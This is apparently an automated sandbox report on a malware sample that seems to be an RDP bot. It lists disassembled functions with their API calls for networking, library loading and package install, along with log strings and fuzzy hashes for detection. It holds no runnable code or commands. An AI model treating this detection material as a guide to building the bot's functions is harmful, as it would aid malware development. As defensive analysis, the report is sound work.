Function 00007FF76A9043A9 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 66COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(?,?,?,?,?,?,00007FF76A9082A5), ref: 00007FF76A9043B2
GetLastError.KERNEL32(?,?,?,?,?,?,00007FF76A9082A5), ref: 00007FF76A9043F7

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF76A9043E4
(path != NULL), xrefs: 00007FF76A9043D6
fs_path_exists, xrefs: 00007FF76A9043DD
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF76A9043CF

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: AttributesErrorFileLast
String ID: (path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
API String ID: 1799206407-1112464793
Opcode ID: 38fd0e5ace3a90731aa4c1de3ed54d7d45c7ed19f706f8952875fd285bf06559
Instruction ID: 97232e82dc0d58ec4fd7354e9477f83399be3cb31a381f3c20d883782188e543
Opcode Fuzzy Hash: 38fd0e5ace3a90731aa4c1de3ed54d7d45c7ed19f706f8952875fd285bf06559
Instruction Fuzzy Hash: B921E750F5C783C2FB60B658954437DA180AFA0389FF466FAD14FCA5D0CE1CEC855A22

Function 00007FFE115066C9 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 66COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32 ref: 00007FFE115066D2
GetLastError.KERNEL32 ref: 00007FFE11506717

Strings

[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11506704
fs_path_exists, xrefs: 00007FFE115066FD
(path != NULL), xrefs: 00007FFE115066F6
H:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FFE115066EF

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: AttributesErrorFileLast
String ID: (path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_path_exists
API String ID: 1799206407-1112464793
Opcode ID: 8eb77c29a115483c1d00370f553c19a5abcb69a10457035b0e447320d5318180
Instruction ID: c20d61a5ea7076410e9d22f62f488f79098d6a52c9d950631a1edbeb45b86637
Opcode Fuzzy Hash: 8eb77c29a115483c1d00370f553c19a5abcb69a10457035b0e447320d5318180
Instruction Fuzzy Hash: 9F21CD50E0CC8382FB654ADAA86437C225EAF00339F7449BBD04ECA1F0DE1DED859622

Function 00007FFE11502A1A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 50networkCOMMON

Download Yara Rule

APIs

recv.WS2_32 ref: 00007FFE11502A42
WSAGetLastError.WS2_32 ref: 00007FFE11502A5C

Strings

tcp_recv, xrefs: 00007FFE11502A76, 00007FFE11502A8E, 00007FFE11502AB3
[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE11502A7D
[D] (%s) -> Disconnected(sock=0x%llx), xrefs: 00007FFE11502A95
[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d), xrefs: 00007FFE11502ABA

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: ErrorLastrecv
String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
API String ID: 2514157807-65069805
Opcode ID: c951a779dacf63a1d93b4dead8992f5f86d12e3367585fa900f4cf7e67898cdc
Instruction ID: 4a14b12112b32f653a26acbd46b19ee21f885cc5a1d5b6f6a921e525e705085b
Opcode Fuzzy Hash: c951a779dacf63a1d93b4dead8992f5f86d12e3367585fa900f4cf7e67898cdc
Instruction Fuzzy Hash: B9119150A0CD2391FB61539BE85027D22496F407F8F4053B9DC3E8A6F6DE9CA9868300

Function 00007FFE0EB4559A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 50networkCOMMON

Download Yara Rule

APIs

recv.WS2_32 ref: 00007FFE0EB455C2
WSAGetLastError.WS2_32 ref: 00007FFE0EB455DC

Strings

[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d), xrefs: 00007FFE0EB4563A
[D] (%s) -> Disconnected(sock=0x%llx), xrefs: 00007FFE0EB45615
[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE0EB455FD
tcp_recv, xrefs: 00007FFE0EB455F6, 00007FFE0EB4560E, 00007FFE0EB45633

Memory Dump Source

Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd

Similarity

API ID: ErrorLastrecv
String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
API String ID: 2514157807-65069805
Opcode ID: a021e5ef6c9586560b76b53494add684adde04dba7e40392e4befabed449ac76
Instruction ID: e56dc9eff2860ec37c974bd0888b7b1d097aeb1c1e0e716b6859889fbf120d95
Opcode Fuzzy Hash: a021e5ef6c9586560b76b53494add684adde04dba7e40392e4befabed449ac76
Instruction Fuzzy Hash: 7E116D91E1EA0B56FA349F29A8403B81251AF407B0F508331DDAD866F1EE2CA5468B00

Function 00007FFE11EC2B5A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 50networkCOMMON

Download Yara Rule

APIs

recv.WS2_32 ref: 00007FFE11EC2B82
WSAGetLastError.WS2_32 ref: 00007FFE11EC2B9C

Strings

[D] (%s) -> Disconnected(sock=0x%llx), xrefs: 00007FFE11EC2BD5
tcp_recv, xrefs: 00007FFE11EC2BB6, 00007FFE11EC2BCE, 00007FFE11EC2BF3
[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d), xrefs: 00007FFE11EC2BFA
[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE11EC2BBD

Memory Dump Source

Source File: 00000015.00000002.2484854998.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000015.00000002.2484834641.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484885042.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484904334.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484920861.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484937141.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484954358.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11ec0000_main.jbxd

Similarity

API ID: ErrorLastrecv
String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
API String ID: 2514157807-65069805
Opcode ID: 600fb125d6f5a9079b8c509fb790a0880408a47db6870ead9de6cf7768b8e42f
Instruction ID: c2e2bc99f1896020a7fd68f9a2bdf09e21b30106d6722e7998532203ca4b268f
Opcode Fuzzy Hash: 600fb125d6f5a9079b8c509fb790a0880408a47db6870ead9de6cf7768b8e42f
Instruction Fuzzy Hash: 72115150A0DD5B42FB106BA7EC403BA13596F057F0F9857B0D82E566F2DE1CB9968300

Function 00007FF76A901694 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 28libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,?,service,000001DE38FB13D0,00007FF76A909404), ref: 00007FF76A9016A2

Part of subcall function 00007FF76A9099E2: fwrite.MSVCRT ref: 00007FF76A909A8E
Part of subcall function 00007FF76A9099E2: fflush.MSVCRT ref: 00007FF76A909A9A

GetLastError.KERNEL32(?,?,service,000001DE38FB13D0,00007FF76A909404), ref: 00007FF76A9016CE

Strings

service, xrefs: 00007FF76A901695
[I] (%s) -> Done(name=%s,ret=0x%p), xrefs: 00007FF76A9016BD
[E] (%s) -> Failed(name=%s,gle=%lu), xrefs: 00007FF76A9016E1
module_load, xrefs: 00007FF76A9016B6, 00007FF76A9016DA

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: ErrorLastLibraryLoadfflushfwrite
String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load$service
API String ID: 4085810780-4145076245
Opcode ID: 44a3c61c7f841f6fdd73cb310ba1271f7bb522fdb1b69e3fa0a93461e7fa5b29
Instruction ID: 8574786078315977af04ed4a29520c13295de27a31a3390aa4db31a0300d78fe
Opcode Fuzzy Hash: 44a3c61c7f841f6fdd73cb310ba1271f7bb522fdb1b69e3fa0a93461e7fa5b29
Instruction Fuzzy Hash: 1EF0BE10B0A703C9FE12B75AAC500B4A2506F05BC8FF804B5CD0C87751ED2DAD86C330

Function 00007FFE11502DDE Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 26networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 00007FFE11502DF0

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

Strings

[E] (%s) -> WSAStartup failed(ret=%d), xrefs: 00007FFE11502E2F
Done, xrefs: 00007FFE11502DFA
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE11502E44
net_init, xrefs: 00007FFE11502E01, 00007FFE11502E25
[I] (%s) -> %s, xrefs: 00007FFE11502E08

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: Startupfflushfwrite
String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
API String ID: 3771387389-898331216
Opcode ID: 2d57f8f816d0c29b1e4946315c1927828a9d8b7d9ea682e483b0f31a80183f6f
Instruction ID: 8ce2477bd05b3e9710a4c5bae974c8f53f3f856e13aabe3147a34febb0652d2c
Opcode Fuzzy Hash: 2d57f8f816d0c29b1e4946315c1927828a9d8b7d9ea682e483b0f31a80183f6f
Instruction Fuzzy Hash: 74F06DA1B0CE03A5FB529B57E8503F8231AAF143B4F8405BAD80E4A1B7EE5DE5498700

Function 00007FFE0EB4595E Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 26networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 00007FFE0EB45970

Part of subcall function 00007FFE0EB41292: fwrite.MSVCRT ref: 00007FFE0EB4133E
Part of subcall function 00007FFE0EB41292: fflush.MSVCRT ref: 00007FFE0EB4134A

Strings

[E] (%s) -> WSAStartup failed(ret=%d), xrefs: 00007FFE0EB459AF
net_init, xrefs: 00007FFE0EB45981, 00007FFE0EB459A5
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE0EB459C4
Done, xrefs: 00007FFE0EB4597A
[I] (%s) -> %s, xrefs: 00007FFE0EB45988

Memory Dump Source

Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd

Similarity

API ID: Startupfflushfwrite
String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
API String ID: 3771387389-898331216
Opcode ID: b0e823c6e930fdcfab4c5bd324a1594f4958c7afa287811d57dcb3535c712e05
Instruction ID: 48f034637672fb6a1669f4886f288e988f552bf5d4b7ef60340667aab2f9bb19
Opcode Fuzzy Hash: b0e823c6e930fdcfab4c5bd324a1594f4958c7afa287811d57dcb3535c712e05
Instruction Fuzzy Hash: CFF01DA1F1A94792FB359F18E8063F52361EF54784F44443AD98D866B6EE1CE5498F00

Function 00007FFE0E162DDE Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 26networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 00007FFE0E162DF0

Part of subcall function 00007FFE0E161292: fwrite.MSVCRT ref: 00007FFE0E16133E
Part of subcall function 00007FFE0E161292: fflush.MSVCRT ref: 00007FFE0E16134A

Strings

[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE0E162E44
net_init, xrefs: 00007FFE0E162E01, 00007FFE0E162E25
[E] (%s) -> WSAStartup failed(ret=%d), xrefs: 00007FFE0E162E2F
[I] (%s) -> %s, xrefs: 00007FFE0E162E08
Done, xrefs: 00007FFE0E162DFA

Memory Dump Source

Source File: 00000015.00000002.2484499625.00007FFE0E161000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000015.00000002.2484478122.00007FFE0E160000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484520770.00007FFE0E174000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484539782.00007FFE0E17D000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484557065.00007FFE0E180000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000015.00000002.2484573253.00007FFE0E181000.00000008.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0e160000_main.jbxd

Similarity

API ID: Startupfflushfwrite
String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
API String ID: 3771387389-898331216
Opcode ID: 5124ac14fcf3d2f0fb5204d63161834fb47c8434f70f0caa57941e07c2c0f691
Instruction ID: 350c13c57bc2e2fdcf8d1dacd5220ec29b3317bf62508ff1e0cdfbf23a47f2db
Opcode Fuzzy Hash: 5124ac14fcf3d2f0fb5204d63161834fb47c8434f70f0caa57941e07c2c0f691
Instruction Fuzzy Hash: 43F030A1B0D40791FB119B25E8443F523616F54BD5F544837D8ED461B6EE6DE548C700

Function 00007FFE11EC2F1E Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 26networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32 ref: 00007FFE11EC2F30

Part of subcall function 00007FFE11EC2FD2: fwrite.MSVCRT ref: 00007FFE11EC307E
Part of subcall function 00007FFE11EC2FD2: fflush.MSVCRT ref: 00007FFE11EC308A

Strings

[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE11EC2F84
[I] (%s) -> %s, xrefs: 00007FFE11EC2F48
net_init, xrefs: 00007FFE11EC2F41, 00007FFE11EC2F65
[E] (%s) -> WSAStartup failed(ret=%d), xrefs: 00007FFE11EC2F6F
Done, xrefs: 00007FFE11EC2F3A

Memory Dump Source

Source File: 00000015.00000002.2484854998.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000015.00000002.2484834641.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484885042.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484904334.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484920861.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484937141.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.2484954358.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11ec0000_main.jbxd

Similarity

API ID: Startupfflushfwrite
String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
API String ID: 3771387389-898331216
Opcode ID: d3150d479d03185cf1df052be2b4772a1426cce77eaf7377fc5e95477546ca01
Instruction ID: 2c189b096d5cb1e7e7c43f4c978270bd5bdf099b3c90fdc92686eec80f037bf0
Opcode Fuzzy Hash: d3150d479d03185cf1df052be2b4772a1426cce77eaf7377fc5e95477546ca01
Instruction Fuzzy Hash: 84F01D60B08D4B92FF109FA2EC457F66218AF203B4F8410B2D40E5A1B6EE9DE5998340

Function 00007FF76A90836F Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 70COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF76A901360: GetModuleHandleExA.KERNEL32(?,?,?,?,?,?,00007FF76A9084AF), ref: 00007FF76A90137E

_mbscpy.MSVCRT ref: 00007FF76A9083DC

Part of subcall function 00007FF76A90824D: strlen.MSVCRT ref: 00007FF76A908258
Part of subcall function 00007FF76A90824D: strlen.MSVCRT ref: 00007FF76A908274
Part of subcall function 00007FF76A90824D: strlen.MSVCRT ref: 00007FF76A908280

Strings

service, xrefs: 00007FF76A908370
[I] (%s) -> Done(pkg_path=%s,tgt_path=%s), xrefs: 00007FF76A908485
[E] (%s) -> Failed(pkg_path=%s,tgt_path=%s,err=%08x), xrefs: 00007FF76A908415
package_install, xrefs: 00007FF76A90840E, 00007FF76A90847E

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: strlen$HandleModule_mbscpy
String ID: [E] (%s) -> Failed(pkg_path=%s,tgt_path=%s,err=%08x)$[I] (%s) -> Done(pkg_path=%s,tgt_path=%s)$package_install$service
API String ID: 3656010895-1379287937
Opcode ID: 0278e259e138aef7b5b47ec0fb05da481d0b7ed9b9eeaf2a18626e7b71e14705
Instruction ID: 707de7127a7041a3324e70b8d2503ff0f1dfaad3b92d4ddf01084a82fa95ef43
Opcode Fuzzy Hash: 0278e259e138aef7b5b47ec0fb05da481d0b7ed9b9eeaf2a18626e7b71e14705
Instruction Fuzzy Hash: 1131813270CB87D1FB55AB64E8913FAB361EB84384FE04076E64D87299DE2DD909C750

Function 00007FF76A901613 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,?,00000000,000001DE38FB13D0,?,00007FF76A90941F), ref: 00007FF76A901633

Part of subcall function 00007FF76A9099E2: fwrite.MSVCRT ref: 00007FF76A909A8E
Part of subcall function 00007FF76A9099E2: fflush.MSVCRT ref: 00007FF76A909A9A

GetLastError.KERNEL32(?,?,00000000,000001DE38FB13D0,?,00007FF76A90941F), ref: 00007FF76A901666

Strings

[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu), xrefs: 00007FF76A90167D
module_get_proc, xrefs: 00007FF76A90164C, 00007FF76A901676
[D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p), xrefs: 00007FF76A901653

Memory Dump Source

Source File: 00000015.00000002.2483285777.00007FF76A901000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF76A900000, based on PE: true

Associated: 00000015.00000002.2483271278.00007FF76A900000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483340862.00007FF76A910000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A918000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483552504.00007FF76A91A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000015.00000002.2483585321.00007FF76A91E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ff76a900000_main.jbxd

Similarity

API ID: AddressErrorLastProcfflushfwrite
String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
API String ID: 1224403792-3063791425
Opcode ID: 72a1d32406d5cd9eb47b613c8f5aff9778c65903043b907605b2154eaad96c50
Instruction ID: bcdd5d4b156581fd379adbe953e6c1730cd0244ded0e9ae68ce2d64e828de991
Opcode Fuzzy Hash: 72a1d32406d5cd9eb47b613c8f5aff9778c65903043b907605b2154eaad96c50
Instruction Fuzzy Hash: A1F0D190A08703C5FE526705E9015B992516F45BD8FB84176CD5C8B799EE2CEA568320

Function 00007FFE11509F73 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FFE11509F93

Part of subcall function 00007FFE11501292: fwrite.MSVCRT ref: 00007FFE1150133E
Part of subcall function 00007FFE11501292: fflush.MSVCRT ref: 00007FFE1150134A

GetLastError.KERNEL32 ref: 00007FFE11509FC6

Strings

[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu), xrefs: 00007FFE11509FDD
module_get_proc, xrefs: 00007FFE11509FAC, 00007FFE11509FD6
[D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p), xrefs: 00007FFE11509FB3

Memory Dump Source

Source File: 00000015.00000002.2484741717.00007FFE11501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE11500000, based on PE: true

Associated: 00000015.00000002.2484724506.00007FFE11500000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484764263.00007FFE11513000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484781987.00007FFE1151C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484799804.00007FFE1151F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000015.00000002.2484817525.00007FFE11520000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe11500000_main.jbxd

Similarity

API ID: AddressErrorLastProcfflushfwrite
String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
API String ID: 1224403792-3063791425
Opcode ID: 207ffa58a88764108bf6decabdb2f8972244fc5bfb5b7b5920c4db14a3a95db6
Instruction ID: 1c8e88220af6199d74cae757419760c8a030a78d423ea027304f2734d01111bc
Opcode Fuzzy Hash: 207ffa58a88764108bf6decabdb2f8972244fc5bfb5b7b5920c4db14a3a95db6
Instruction Fuzzy Hash: 54F08190B1DE0391FB139B9BA9001B9636AAF44BE0F448579DC5D4B7B9EE2CE5468300

Function 00007FFE0EB41A23 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FFE0EB41A43

Part of subcall function 00007FFE0EB41292: fwrite.MSVCRT ref: 00007FFE0EB4133E
Part of subcall function 00007FFE0EB41292: fflush.MSVCRT ref: 00007FFE0EB4134A

GetLastError.KERNEL32 ref: 00007FFE0EB41A76

Strings

[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu), xrefs: 00007FFE0EB41A8D
[D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p), xrefs: 00007FFE0EB41A63
module_get_proc, xrefs: 00007FFE0EB41A5C, 00007FFE0EB41A86

Memory Dump Source

Source File: 00000015.00000002.2484609499.00007FFE0EB41000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000015.00000002.2484591156.00007FFE0EB40000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484635439.00007FFE0EB56000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484666608.00007FFE0EB60000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484687240.00007FFE0EB63000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000015.00000002.2484704200.00007FFE0EB64000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7ffe0eb40000_main.jbxd

Similarity

API ID: AddressErrorLastProcfflushfwrite
